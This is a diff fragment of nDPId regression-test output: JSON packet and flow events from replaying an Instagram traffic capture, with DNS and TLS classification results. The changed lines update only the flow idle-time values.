00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1436720908533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908533,"pkt":"ABsv8H60QPMIw47hCABFAABL7oJAAEARewDAqABnCAgICGesADUANyZVhbMBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"} 00792{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1436720908570,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"thread_ts_msec":1436720908570,"pkt":"QPMIw47hABsv8H60CABFAAEjliwAADgRGn8ICAgIwKgAZwA1yBMBD5NUN7CBgAABAAoAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAZACoQaWdjZG4tcGhvdG9zLWgtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAADHJABYFYTE0MDgGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGrsBxAAEAAQAAABMABC4hRqHAcQABAAEAAAATAAQuIUawwHEAAQABAAAAEwAELiFGpsBxAAEAAQAAABMABC4hRo\/AcQABAAEAAAATAAQuIUagwHEAAQABAAAAEwAELiFGqcBxAAEAAQAAABMABC4hRrc="} 00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1436720908575,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908575,"pkt":"QPMIw47hABsv8H60CABFAADD9CwAADgRvN4ICAgIwKgAZwA1g0MAr7pub2OBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAhACoQaWdjZG4tcGhvdG9zLWEtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFRcABYFYTEwMDEGZHNwdzQwBmFrYW1hacAmwHEAAQABAAAAEwAEUlUamsBxAAEAAQAAABMABFJVGpk="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1436720908579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908579,"pkt":"QPMIw47hABsv8H60CABFAADD9DAAADgRvNoICAgIwKgAZwA1Z6wAr0GdhbOBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAA3ACoQaWdjZG4tcGhvdG9zLWctYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFQ9ABYFYTEwMDcGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGiMBxAAEAAQAAABMABC4hRo4="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"} -00985{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"} -00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"} -00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 